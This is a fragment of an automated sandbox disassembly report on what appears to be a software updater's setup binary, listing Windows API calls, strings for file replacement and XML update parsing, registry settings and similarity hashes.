                                                                                                                            • Part of subcall function 00C17951: __EH_prolog3_GS.LIBCMT ref: 00C17958
                                                                                                                            • Part of subcall function 00C17951: _strlen.LIBCMT ref: 00C17975
                                                                                                                            • Part of subcall function 00C17951: GetFileAttributesW.KERNEL32(?,00000000,00000024,00C170C4,?), ref: 00C179B9
                                                                                                                            • Part of subcall function 00C17951: GetFileAttributesW.KERNEL32(?,.bak,00000000,?,00000000), ref: 00C17A33
                                                                                                                            • Part of subcall function 00C17951: MoveFileW.KERNEL32(?,?), ref: 00C17A6B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Deallocate$File$AttributesH_prolog3__strlen$Move
                                                                                                                          • String ID: %S$BACKUP$COPY$COPYREGVALUE$DELETE$DELETEALL$DOCRASH$MAKEDIR$MOVE$MSG$REG$RENAME$SETFROMXML$SHOW$Unknown command : %S$XCOPY$XMLDELETE$XMLINSERT$XMLMERGE
                                                                                                                          • API String ID: 3830453046-910192202
                                                                                                                          • Opcode ID: a3746a9bac48abe833e48a81f1df9277c7239858b603aa485205fbabacb64567
                                                                                                                          • Instruction ID: c085166f1be90bcbb1c7f6bc48725725af609e0ef496efc487200933ce3d0268
                                                                                                                          • Opcode Fuzzy Hash: a3746a9bac48abe833e48a81f1df9277c7239858b603aa485205fbabacb64567
                                                                                                                          • Instruction Fuzzy Hash: B9D1B871E08206BADF14EAF9D8465ED7BB89F57320F20416EF405E7282DE309E46B652
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify), ref: 00C38CFA
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_ShareViolation), ref: 00C38D0A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_FileNameOK), ref: 00C38D1A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_ColorOK), ref: 00C38D2A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_help), ref: 00C38D3A
                                                                                                                          • RegisterWindowMessageW.USER32(commdlg_SetRGBColor), ref: 00C38D4A
                                                                                                                          • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 00C38E72
                                                                                                                            • Part of subcall function 00C32C8F: SetWindowLongW.USER32(?,000000FC,00C2F2FC), ref: 00C32CD3
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageWindow$Register$H_prolog3LongSend
                                                                                                                          • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                          • API String ID: 1550484310-3888057576
                                                                                                                          • Opcode ID: 15d55f7bd85a4dde0642cdd5a4e7f84fcdacc2da85b7e282550e6fe1ab8a9087
                                                                                                                          • Instruction ID: 16ef31071d7465fafa56fd58217523fa2d452903ff13fad4f92aecf42d9c4f51
                                                                                                                          • Opcode Fuzzy Hash: 15d55f7bd85a4dde0642cdd5a4e7f84fcdacc2da85b7e282550e6fe1ab8a9087
                                                                                                                          • Instruction Fuzzy Hash: 34810236710611AFCB116F65EC88BBE3769FB84350F0A002AF911A7291DF74DE419BA1
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C17643
• _strlen.LIBCMT ref: 00C1767E
• _strlen.LIBCMT ref: 00C176CD
• GetFileAttributesW.KERNEL32(?,IGNORE_SHAREINGERROR,00000000,00000000,00000058,00C1702B,?), ref: 00C17723
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00C17741
• Sleep.KERNEL32(000007D0), ref: 00C1780E
  • Part of subcall function 00C23D24: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,00000000,00C94050,000000FF), ref: 00C23D47
  • Part of subcall function 00C23D24: GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D50
• Sleep.KERNEL32(000007D0), ref: 00C1786B
  • Part of subcall function 00C189E2: _strlen.LIBCMT ref: 00C189EB
Strings
• File replaced successfully., xrefs: 00C17896
• Failed to replace %s due to error %d..., xrefs: 00C178F4
• Failed to replace %s due to Sharing violation..., xrefs: 00C177F9
• Copy : "%s" -> "%s", xrefs: 00C1777E
• , xrefs: 00C177CA
• Failed.... Retrying again in 2sec (Error Code : %d), xrefs: 00C17856
• IGNORE_FILENOTFOUND, xrefs: 00C178AE
• Failed to replace %s, file not found. Expected result. Ignoring error., xrefs: 00C178CB
• IGNORE_SHAREINGERROR, xrefs: 00C17701
• Failed to replace %s due to Sharing violation. Ignoring Error, xrefs: 00C177E6
• Retrying..., xrefs: 00C17814
• Failed to copy file. Invalid parameters, xrefs: 00C17918
• Failed... Giving up., xrefs: 00C1787E
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
• Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c00000_setup.jbxd
Similarity
• API ID: File_strlen$AttributesSleep$CreateErrorH_prolog3_Last
• String ID: $Copy : "%s" -> "%s"$Failed to copy file. Invalid parameters$Failed to replace %s due to Sharing violation. Ignoring Error$Failed to replace %s due to Sharing violation...$Failed to replace %s due to error %d...$Failed to replace %s, file not found. Expected result. Ignoring error.$Failed... Giving up.$Failed.... Retrying again in 2sec (Error Code : %d)$File replaced successfully.$IGNORE_FILENOTFOUND$IGNORE_SHAREINGERROR$Retrying...
• API String ID: 318860920-2674590518
APIs
• GetModuleFileNameW.KERNEL32(?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF52
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EF9E
• GetFileSize.KERNEL32(00000000,00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFBC
• GetFileTime.KERNEL32(00000000,00000000,00000000,?,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFD4
• CloseHandle.KERNEL32(00000000,?,?,0000040E,?,00C1F2B2,00000001), ref: 00C1EFF8
• lstrcpynW.KERNEL32(?,?,0000018E,?,?,?), ref: 00C1F0B1
Similarity
• API ID: File$CloseCreateHandleModuleNameSizeTimelstrcpyn
• String ID: Company: %s$ FileDesc: %s$ FileVer: %d.%d.%d.%d$ ProdVer: %d.%d.%d.%d$ Product: %s$%s$Checksum: 0x%08x Time Stamp: 0x%08x$File Size: %-10d File Time: %s$Image Base: 0x%08x Image Size: 0x%08x$Module %d$Version Information:
• API String ID: 3235147344-2255338270
APIs
• CreatePen.GDI32(00000000,00000001,?), ref: 00C0E6B7
• SelectObject.GDI32(?,00000000), ref: 00C0E6C6
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E6DD
• LineTo.GDI32(?,?,?), ref: 00C0E6EF
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E702
• LineTo.GDI32(?,?,?), ref: 00C0E714
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E73E
• LineTo.GDI32(?,?,?), ref: 00C0E74D
• SelectObject.GDI32(?,?), ref: 00C0E76C
• DeleteObject.GDI32(?), ref: 00C0E776
• CreatePen.GDI32(00000000,00000001,?), ref: 00C0E7C5
• SelectObject.GDI32(?,00000000), ref: 00C0E7D4
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E7EC
• LineTo.GDI32(?,?,?), ref: 00C0E7FE
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E812
• LineTo.GDI32(?,?,?), ref: 00C0E826
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E84F
• LineTo.GDI32(?,?,?), ref: 00C0E85B
• SelectObject.GDI32(?,?), ref: 00C0E87A
• DeleteObject.GDI32(?), ref: 00C0E884
Similarity
• API ID: LineMoveObject$Select$CreateDelete
• String ID:
• API String ID: 610386545-0
APIs
• CreatePen.GDI32(00000000,00000001,?), ref: 00C0E272
• SelectObject.GDI32(?,00000000), ref: 00C0E281
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E299
• LineTo.GDI32(?,?,?), ref: 00C0E2AB
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E2BF
• LineTo.GDI32(?,?,?), ref: 00C0E2D1
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 00C0E2F3
• LineTo.GDI32(00000000,?,?), ref: 00C0E302
• SelectObject.GDI32(?,?), ref: 00C0E321
• DeleteObject.GDI32(?), ref: 00C0E32B
• CreatePen.GDI32(00000000,00000001,?), ref: 00C0E37A
• SelectObject.GDI32(?,00000000), ref: 00C0E389
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E3A1
• LineTo.GDI32(?,?,?), ref: 00C0E3B3
• MoveToEx.GDI32(?,?,?,00000000), ref: 00C0E3C7
• LineTo.GDI32(?,?,?), ref: 00C0E3DB
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 00C0E400
• LineTo.GDI32(00000000,?,?), ref: 00C0E40C
• SelectObject.GDI32(?,?), ref: 00C0E42B
• DeleteObject.GDI32(?), ref: 00C0E435
Similarity
• API ID: LineMoveObject$Select$CreateDelete
• String ID:
• API String ID: 610386545-0
APIs
  • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
• GetParent.USER32(0000001C), ref: 00C2FCA5
• SendMessageW.USER32(00000000,0000036B,00000000,00000000), ref: 00C2FCC7
• GetWindowRect.USER32(0000001C,?), ref: 00C2FCEB
• GetWindowLongW.USER32(00000000,000000F0), ref: 00C2FD0B
• MonitorFromWindow.USER32(00000000,00000001), ref: 00C2FD44
• GetMonitorInfoW.USER32(00000000), ref: 00C2FD4B
• CopyRect.USER32(?,?), ref: 00C2FD59
• GetWindowRect.USER32(00000000,?), ref: 00C2FD66
• MonitorFromWindow.USER32(00000000,00000002), ref: 00C2FD73
• GetMonitorInfoW.USER32(00000000), ref: 00C2FD7A
• CopyRect.USER32(?,?), ref: 00C2FD88
• GetParent.USER32(0000001C), ref: 00C2FD92
• GetClientRect.USER32(00000000,?), ref: 00C2FD9F
• GetClientRect.USER32(00000000,?), ref: 00C2FDAA
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00C2FDB8
Similarity
• API ID: Window$Rect$Monitor$ClientCopyFromInfoLongParent$MessagePointsSend
• String ID: (
• API String ID: 3610148278-3887548279
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C20AD6
  • Part of subcall function 00C351FB: GetWindowLongW.USER32(0000001C,000000F0), ref: 00C35208
• OffsetRect.USER32(?,?,?), ref: 00C20B4E
  • Part of subcall function 00C2D092: __EH_prolog3.LIBCMT ref: 00C2D099
  • Part of subcall function 00C2D092: GetWindowDC.USER32(00000000,00000004,00000000,?,00000058,00C1C274), ref: 00C2D0C5
• CreateCompatibleDC.GDI32(?), ref: 00C20B70
  • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6E4
  • Part of subcall function 00C2D6D6: SaveDC.GDI32(?), ref: 00C2D6F5
• CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C20BAF
  • Part of subcall function 00C2D7E9: SelectObject.GDI32(?,?), ref: 00C2D7F2
• GetSysColor.USER32(0000000F), ref: 00C20BCB
  • Part of subcall function 00C2CF46: __EH_prolog3.LIBCMT ref: 00C2CF4D
  • Part of subcall function 00C2CF46: CreateSolidBrush.GDI32(?), ref: 00C2CF68
• GetBrushOrgEx.GDI32(?,?,00000000), ref: 00C20BE5
• SetBrushOrgEx.GDI32(?,00000008,00000008,?), ref: 00C20C26
• FillRect.USER32(?,?,?), ref: 00C20C42
• GetSysColor.USER32(00000010), ref: 00C20C57
• Rectangle.GDI32(?,?,?,?,?), ref: 00C20C87
• GetSysColor.USER32(00000012), ref: 00C20CA2
• GetSysColor.USER32(00000005), ref: 00C20CDE
  • Part of subcall function 00C2D048: __EH_prolog3.LIBCMT ref: 00C2D04F
  • Part of subcall function 00C2D048: CreatePen.GDI32(?,?,?), ref: 00C2D070
  • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D822
  • Part of subcall function 00C2D802: SelectObject.GDI32(?,00000000), ref: 00C2D838
• Rectangle.GDI32(?,?,?,?,?), ref: 00C20D29
• DrawEdge.USER32(?,?,00000005,0000000F), ref: 00C20D62
• GetSysColor.USER32(00000014), ref: 00C20D79
• GetSysColor.USER32(00000010), ref: 00C20D8B
• GetSysColor.USER32(00000012), ref: 00C20D96
• BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 00C20E1A
Memory Dump Source
• Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
Similarity
• API ID: Color$Create$BrushH_prolog3ObjectSelect$CompatibleRectRectangleSaveWindow$BitmapDrawEdgeFillH_prolog3_LongOffsetSolid
• String ID:
• API String ID: 399950698-0
APIs
Strings
Similarity
• API ID: H_prolog3_
• String ID: /beta$/debug$/stable$32bit$64bit$XML Parse Error.. aborting...$XML Parse error. did not find version info in xml file.$full$minversion$platform$update$updates/$url$version
• API String ID: 2427045233-3910716457
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C330DA
  • Part of subcall function 00C3E462: __EH_prolog3.LIBCMT ref: 00C3E47F
• CallNextHookEx.USER32(?,?,?,?), ref: 00C33112
• SetWindowLongW.USER32(?,000000FC,00C2F2FC), ref: 00C331B6
• CallNextHookEx.USER32(?,00000003,?,?), ref: 00C332C6
• UnhookWindowsHookEx.USER32(?), ref: 00C332DA
Strings
Similarity
• API ID: Hook$CallNext$H_prolog3H_prolog3_LongUnhookWindowWindows
• String ID: #32768$AfxOldWndProc423
• API String ID: 1591070667-2141921550
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C12CE5
• ScreenToClient.USER32(?,?), ref: 00C12D0C
• CreatePopupMenu.USER32 ref: 00C12D52
• AppendMenuW.USER32(?,00000000,00000001,00000000), ref: 00C12DB5
• AppendMenuW.USER32(?,00000000,00000002,00000000), ref: 00C12DCB
• AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12DDC
• AppendMenuW.USER32(?,00000000,00000005,00000000), ref: 00C12E0F
• AppendMenuW.USER32(?,00000000,00000003,00000000), ref: 00C12E67
• AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12E9D
• AppendMenuW.USER32(?,00000000,0000000A,00000000), ref: 00C12EB8
  • Part of subcall function 00C12B7E: CreatePopupMenu.USER32 ref: 00C12BA7
  • Part of subcall function 00C12B7E: _strlen.LIBCMT ref: 00C12BD6
  • Part of subcall function 00C12B7E: AppendMenuW.USER32(?,00000000,00000096,00000000), ref: 00C12C0D
  • Part of subcall function 00C12B7E: AppendMenuW.USER32(?,00000010,?,00000000), ref: 00C12C33
• AppendMenuW.USER32(?,00000000,0000000F,00000000), ref: 00C12ED3
  • Part of subcall function 00C11F0F: InvalidateRect.USER32(?,00000000,00000001,?,?,?,?,?,?,?,00C10B06,?,?,?,?), ref: 00C11F3C
• AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12EEF
• AppendMenuW.USER32(?,00000000,00000014,00000000), ref: 00C12F04
• AppendMenuW.USER32(?,00000000,00000015,00000000), ref: 00C12F19
• AppendMenuW.USER32(?,00000800,00000000,00CAE150), ref: 00C12F2F
• AppendMenuW.USER32(?,?,0000005A,00000000), ref: 00C12F50
• AppendMenuW.USER32(?,00000000,00000064,00000000), ref: 00C12F67
Similarity
• API ID: Menu$Append$CreatePopup$ClientH_prolog3_InvalidateRectScreen_strlen
• String ID:
• API String ID: 502655507-0
APIs
• __EH_prolog3_GS.LIBCMT ref: 00C1736F
  • Part of subcall function 00C189E2: _strlen.LIBCMT ref: 00C189EB
• _strlen.LIBCMT ref: 00C173E2
• _strlen.LIBCMT ref: 00C17428
• _strlen.LIBCMT ref: 00C174A9
• _strlen.LIBCMT ref: 00C174EF
• GetLastError.KERNEL32(?,?,?,?,?,?,0000005C,00C17084,?), ref: 00C17536
• _strlen.LIBCMT ref: 00C17561
  • Part of subcall function 00C03869: MultiByteToWideChar.KERNEL32(?,00000000,00000000,000000FF,?,?), ref: 00C0388C
• _strlen.LIBCMT ref: 00C175AE
Strings
• DO_NOT_REPLACE, xrefs: 00C173B0
• Failed to replace files in %s due to Sharing violation..., xrefs: 00C1758E
• Failed to xcopy files. Invalid parameters, xrefs: 00C17605
• XCopy: "%s" --> "%s", xrefs: 00C17475
• Failed to replace a file in %s due to error %d..., xrefs: 00C175DE
                                                                                                                          Similarity
                                                                                                                          • API ID: _strlen$ByteCharErrorH_prolog3_LastMultiWide
                                                                                                                          • String ID: DO_NOT_REPLACE$Failed to replace a file in %s due to error %d...$Failed to replace files in %s due to Sharing violation...$Failed to xcopy files. Invalid parameters$XCopy: "%s" --> "%s"
                                                                                                                          • API String ID: 2242062638-2925842352
                                                                                                                          • Opcode ID: 5c19594c09da95a39c614f675b614539e22fde3aa0448480a646e1af92d50085
                                                                                                                          • Instruction ID: 51769a17d7af7d759b73e1a52055bc1b8a39396f4dcdef5637e3d14a36b11ba1
                                                                                                                          • Opcode Fuzzy Hash: 5c19594c09da95a39c614f675b614539e22fde3aa0448480a646e1af92d50085
                                                                                                                          • Instruction Fuzzy Hash: 0391A371E04208EBDF11EBE5C8459DE7B7ABF06310F144225F415AB291DB319E89FB90
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,?,00000108,00C3996C,?,?), ref: 00C40828
                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThreadPreferredUILanguages), ref: 00C40838
                                                                                                                          • EncodePointer.KERNEL32(00000000,?,?,?,00000108,00C3996C,?,?), ref: 00C40841
                                                                                                                          • DecodePointer.KERNEL32(00000000,?,?,?,?,?,00000108,00C3996C,?,?), ref: 00C4084F
                                                                                                                          • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000108,00C3996C,?,?), ref: 00C40876
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C40886
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C408BA
                                                                                                                          • GetSystemDefaultUILanguage.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C408ED
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C408FD
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C4093A
                                                                                                                          • ___crtDownlevelLCIDToLocaleName.LIBCPMT ref: 00C40975
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: DownlevelLocaleName___crt$DefaultLanguagePointer$AddressDecodeEncodeHandleModuleProcSystemUser
                                                                                                                          • String ID: GetThreadPreferredUILanguages$kernel32.dll
                                                                                                                          • API String ID: 404278886-1646127487
                                                                                                                          • Opcode ID: bc28a09f7dfbb114bc732ee339a8bc4f5a7d59eb5b38da02bfeeee06408e53cd
                                                                                                                          • Instruction ID: 5d8ab7a1a5ce0fe12cbaf432559d108674caa97809466cd1c2bb91da78490387
                                                                                                                          • Opcode Fuzzy Hash: bc28a09f7dfbb114bc732ee339a8bc4f5a7d59eb5b38da02bfeeee06408e53cd
                                                                                                                          • Instruction Fuzzy Hash: 99513C75D0021AAFCB14DFA8CD89EAEB7B9FF48314F104125F615E7251DB34AA09CBA1
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C018C5
                                                                                                                          • SetLastError.KERNEL32(0000007E,?,00000C84,00C018A6,POST,?,?,00000034,00C01613,?,?), ref: 00C0191B
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C019CD
                                                                                                                          • GetLastError.KERNEL32 ref: 00C019E7
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01A1F
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01A76
                                                                                                                          • GetLastError.KERNEL32 ref: 00C01AA1
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01AE8
                                                                                                                          • SetLastError.KERNEL32(0000007E,00000000,00000000,00000000), ref: 00C01B3D
                                                                                                                          • GetLastError.KERNEL32 ref: 00C01B56
                                                                                                                            • Part of subcall function 00C01C9C: SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,00C01902,?,00000C84,00C018A6,POST,?,?,00000034), ref: 00C01CC3
                                                                                                                            • Part of subcall function 00C01C9C: GetLastError.KERNEL32(?,?,?,?,?,?,?,00C01902,?,00000C84,00C018A6,POST,?,?,00000034,00C01613), ref: 00C01CDC
                                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 00C01BB7
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                          • String ID: <
                                                                                                                          • API String ID: 3339191932-4251816714
                                                                                                                          • Opcode ID: e07f4819234ab18d4590c4b44d59ae5c905f85644d53f7c71d3c95b2def5fc26
                                                                                                                          • Instruction ID: aaf232b7dc653994aea6acb847cdc6377a2cad83e21c0b8b3f597d0cd33ddac7
                                                                                                                          • Opcode Fuzzy Hash: e07f4819234ab18d4590c4b44d59ae5c905f85644d53f7c71d3c95b2def5fc26
                                                                                                                          • Instruction Fuzzy Hash: 92916F70A00214AFEB29DF65CC94FAEF7B5BF44704F18419DE95A96290EB709E84DF10
                                                                                                                          APIs
                                                                                                                          • _strncpy.LIBCMT ref: 00C14920
                                                                                                                          • lstrlenA.KERNEL32 ref: 00C1493E
                                                                                                                          • _strncpy.LIBCMT ref: 00C14959
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00C14982
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 00C14998
                                                                                                                          • TabbedTextOutW.USER32(?,?,?,00000000,00000000,00000001,?,?), ref: 00C149CE
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14A0E
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000048), ref: 00C14AAF
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000048), ref: 00C14AC3
                                                                                                                            • Part of subcall function 00C27AB7: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,00C14AD4,?,?,?,?,?,?,00000048), ref: 00C27ACF
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000048), ref: 00C14B10
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000048), ref: 00C14B20
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,?,00000001,?), ref: 00C14B67
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,00000000,00000001,?), ref: 00C14B80
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$TabbedText$Extent_strncpy$ByteCharH_prolog3_MultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 88269689-0
                                                                                                                          • Opcode ID: 7cf3b8372b030166088991706dc952a42f507fc94aca31df468a79a716b7d837
                                                                                                                          • Instruction ID: 5cea709d8560f075300ce0980ac8b230146023850cf39388ee8e3c78cd9db4ba
                                                                                                                          • Opcode Fuzzy Hash: 7cf3b8372b030166088991706dc952a42f507fc94aca31df468a79a716b7d837
                                                                                                                          • Instruction Fuzzy Hash: 7691F371D00119AFDB14EFA0DC86AEEBBB8FF59310F044169F905A7241DB709E81EBA1
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,00000000,00C94050,000000FF), ref: 00C23D47
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D50
                                                                                                                          • GetFileTime.KERNEL32(00000000,?,00C94050,?,?,00000000,00C94050,000000FF), ref: 00C23D6F
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,?,00000000,00000000,?,00000000,00C94050,000000FF), ref: 00C23D89
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D95
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00C94050,000000FF), ref: 00C23DA1
                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,00C94050,000000FF), ref: 00C23DBC
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLast$Create$CloseHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198413326-0
                                                                                                                          • Opcode ID: e0e8d7a145679d470cc417425eee28b22a7276e56c1769c012037e0cc0f64aec
                                                                                                                          • Instruction ID: 906ed66b782ac5c48594b1f31c48a56fdecc9e7c0ee222e95732573899c4fd5a
                                                                                                                          • Opcode Fuzzy Hash: e0e8d7a145679d470cc417425eee28b22a7276e56c1769c012037e0cc0f64aec
                                                                                                                          • Instruction Fuzzy Hash: FE413771A10258AFEB109FA4EC49FBE7BBCFB09711F10015AF921E6190DB74AE44DB60
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C21E8B
                                                                                                                          • GetCapture.USER32 ref: 00C21EA1
                                                                                                                          • ReleaseCapture.USER32 ref: 00C21EB1
                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C21F32
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,00000000,00000104), ref: 00C21FB2
                                                                                                                          • DragFinish.SHELL32(?), ref: 00C2213C
                                                                                                                          • GetParent.USER32(?), ref: 00C22145
                                                                                                                          • IsWindow.USER32(?), ref: 00C2215E
                                                                                                                          • SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C2219C
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: Drag$CaptureFileQuery$FinishH_prolog3_MessageParentReleaseSendWindow
                                                                                                                          • String ID: .lnk$.pif
                                                                                                                          • API String ID: 1279402775-2725715280
                                                                                                                          • Opcode ID: 22cb7e3e16670a83d89567536753c817b8d0c47ec937c3d60d65ebe35a80db1d
                                                                                                                          • Instruction ID: 1621cad94d4a6ae40706ae3deb18367a7d9fc6c6b4611f6bde01851ff038d30d
                                                                                                                          • Opcode Fuzzy Hash: 22cb7e3e16670a83d89567536753c817b8d0c47ec937c3d60d65ebe35a80db1d
                                                                                                                          • Instruction Fuzzy Hash: 46918A7190022AABDF25EBA0EC9ABEDB778AF18314F1041D9E50967291DF349F84DF10
APIs
• __EH_prolog3.LIBCMT ref: 00C1B394
• RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C1B434
• RegCloseKey.ADVAPI32(?), ref: 00C1B446
• RegSetValueExW.ADVAPI32(?,ForceIEUserAgent,00000000,00000004,?,00000004), ref: 00C1B491
• RegSetValueExW.ADVAPI32(?,GetUnstableBeta,00000000,00000004,?,00000004), ref: 00C1B4B6
• RegSetValueExW.ADVAPI32(?,ForceXPEdition,00000000,00000004,?,00000004), ref: 00C1B4DB
• RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,0000006F,00000020), ref: 00C1B4F6
Strings
Memory Dump Source
